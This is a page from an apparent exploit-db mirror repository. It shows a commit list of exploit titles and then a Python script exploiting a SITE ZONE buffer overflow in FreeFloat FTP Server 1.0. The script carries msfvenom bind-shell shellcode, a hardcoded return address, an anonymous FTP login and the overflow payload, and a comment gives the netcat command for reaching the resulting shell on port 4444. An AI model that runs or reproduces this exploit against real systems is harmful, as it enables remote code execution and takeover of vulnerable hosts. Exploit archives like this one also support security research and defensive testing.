bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/remote/40711.py
Offensive Security c65daa1397 DB: 2016-11-05 
7 new exploits

Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow
Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)

Exim 4.41 - dns_build_reverse Local Exploit
Exim 4.41 - 'dns_build_reverse' Local Exploit

3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow

BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)
BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)

ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)

Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow

Winamp 5.551 - MAKI Parsing Integer Overflow Exploit
Winamp 5.551 - MAKI Parsing Integer Overflow

Icarus 2.0 - '.icp' Local Stack Overflow (PoC)
Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)

ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)

Rock Band CMS 0.10 - news.php Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)

Winamp 5.572 - whatsnew.txt Stack Overflow Exploit
Winamp 5.572 - whatsnew.txt Stack Overflow

Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_wmtpic' 1.0 - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)

Joomla! Component MediQnA 1.1 - Local File Inclusion
Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion
Joomla! Component My Car - Multiple Vulnerabilities
Joomla! Component BF Quiz - SQL Injection (1)
Joomla! Component com_jepoll - (pollid) SQL Injection
Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection
Joomla! Component 'com_mycar' - Multiple Vulnerabilities
Joomla! Component 'com_bfquiztrial' - SQL Injection (1)
Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection
Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component BF Quiz - SQL Injection (2)
Joomla! Component 'com_bfquiztrial' - SQL Injection (2)

Joomla! Component com_quran - SQL Injection
Joomla! Component 'com_quran' - SQL Injection

Joomla! Component com_g2bridge - Local File Inclusion
Joomla! Component 'com_g2bridge' - Local File Inclusion

Joomla! Component com_jsjobs - SQL Injection
Joomla! Component 'com_jsjobs' - SQL Injection
Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection
Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection
Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection
Joomla! Component 'com_chronocontact' - Blind SQL Injection

Joomla! Component com_lead - SQL Injection
Joomla! Component 'com_lead' - SQL Injection

Joomla! Component com_djartgallery - Multiple Vulnerabilities
Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities

Joomla! Component com_searchlog - SQL Injection
Joomla! Component 'com_searchlog' - SQL Injection

Joomla! Component com_annonces - Arbitrary File Upload
Joomla! Component 'com_annonces' - Arbitrary File Upload

Joomla! Component cinema - SQL Injection
Joomla! Component 'com_cinema' - SQL Injection

Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component com_jstore - SQL Injection
Joomla! Component com_jtickets - SQL Injection
Joomla! Component com_jcommunity - SQL Injection
Joomla! Component com_jmarket - SQL Injection
Joomla! Component com_jsubscription - SQL Injection
Joomla! Component 'com_jstore' - SQL Injection
Joomla! Component 'com_jtickets' - SQL Injection
Joomla! Component 'com_jcommunity' - SQL Injection
Joomla! Component 'com_jmarket' - SQL Injection
Joomla! Component 'com_jsubscription' - SQL Injection

Joomla! Component com_jnewsletter - SQL Injection
Joomla! Component 'com_jnewsletter' - SQL Injection
Joomla! Component com_joomdocs - Cross-Site Scripting
Joomla! Component Answers 2.3beta - Multiple Vulnerabilities
Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities
Joomla! Component listbingo 1.3 - Multiple Vulnerabilities
Joomla! Component 'com_joomdocs' - Cross-Site Scripting
Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities
Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities

Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting
Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting

Joomla! Component com_eportfolio - Arbitrary File Upload
Joomla! Component 'com_eportfolio' - Arbitrary File Upload
Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting
Joomla! Component Hot Property com_jomestate - Remote File Inclusion
Joomla! Component 'com_community' - Persistent Cross-Site Scripting
Joomla! Component 'com_jomestate' - Remote File Inclusion

Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting
Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting

Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection
Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component Picasa2Gallery - Local File Inclusion
Joomla! Component 'com_picasa2gallery' - Local File Inclusion

Joomla! Component JE Ajax Event Calendar - SQL Injection
Joomla! Component 'jeeventcalendar' - SQL Injection

Joomla! Component com_realtyna - Local File Inclusion
Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component JE Story Submit - SQL Injection
Joomla! Component com_sef - Remote File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component JE Awd Song - Persistent Cross-Site Scripting
Joomla! Component JE Media Player - Local File Inclusion
Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting
Joomla! Component 'JE Media Player' - Local File Inclusion
Joomla! Component JE Event Calendar - Local File Inclusion
Joomla! Component JE Job com_jejob - Local File Inclusion
Joomla! Component JE Section Finder - Local File Inclusion
Joomla! Component 'jeeventcalendar' - Local File Inclusion
Joomla! Component 'com_jejob' - Local File Inclusion
Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection
Joomla! Component Joomanager - SQL Injection
Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection
Joomla! Component 'Joomanager' - SQL Injection

Joomla! Component com_dateconverter 0.1 - SQL Injection
Joomla! Component 'com_dateconverter' 0.1 - SQL Injection

Joomla! Component Front-End Article Manager System - Arbitrary File Upload
Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload

Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection
Joomla! Component 'com_seyret' - Blind SQL Injection

Joomla! Component Seyret (com_seyret) - Local File Inclusion
Joomla! Component 'com_seyret' - Local File Inclusion

Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection
Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection

Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting
Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection
Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection
Joomla! Component 'com_phocagallery' - SQL Injection
Joomla! Component 'com_addressbook' - Blind SQL Injection
Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection
Joomla! Component SEF (com_sef) - Local File Inclusion
Joomla! Component 'com_ninjamonials' - Blind SQL Injection
Joomla! Component 'com_sef' - Local File Inclusion

Joomla! Component JPodium (com_jpodium) - SQL Injection
Joomla! Component 'com_jpodium' - SQL Injection

Joomla! Component com_autartimonial - SQL Injection
Joomla! Component 'com_autartimonial' - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)

Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)
Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)

Microsoft Excel 2010 - Crash PoC (1)
Microsoft Excel 2010 - Crash (PoC) (1)

Brooky CubeCart 2.0.1 - SQL Injection

Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting
Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting

Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting
Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities

Joomla! Component com_sar_news - 'id' Parameter SQL Injection
Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection

Joomla! Component Jreservation - Cross-Site Scripting

Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting

Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion
Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion

Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion
Joomla! Component 'com_canteen' 1.0 - Local File Inclusion

Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)

IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation

VLC Media Player 2.2.1 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - Buffer Overflow

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (1)

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (2)
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation
Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow
BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
2016-11-05 05:01:20 +00:00

58 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a
import socket
# shellcode with metasploit:
# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
# nc 192.168.1.150 4444
ret = "\x2F\x1D\xF1\x77" # GDI32.dll
shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a"
"\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11"
"\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac"
"\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4"
"\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07"
"\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c"
"\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53"
"\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8"
"\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48"
"\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39"
"\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e"
"\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35"
"\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77"
"\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde"
"\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51"
"\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41"
"\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52"
"\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83"
"\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2"
"\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34"
"\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0"
"\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4"
"\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe")
buffer = '\x90' * 30 + shellcode
buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer))
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
connect = s.connect(('192.168.1.150', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('SITE ZONE' + buffer1 + '\r\n')
s.close()
Reference in a new issue View git blame Copy permalink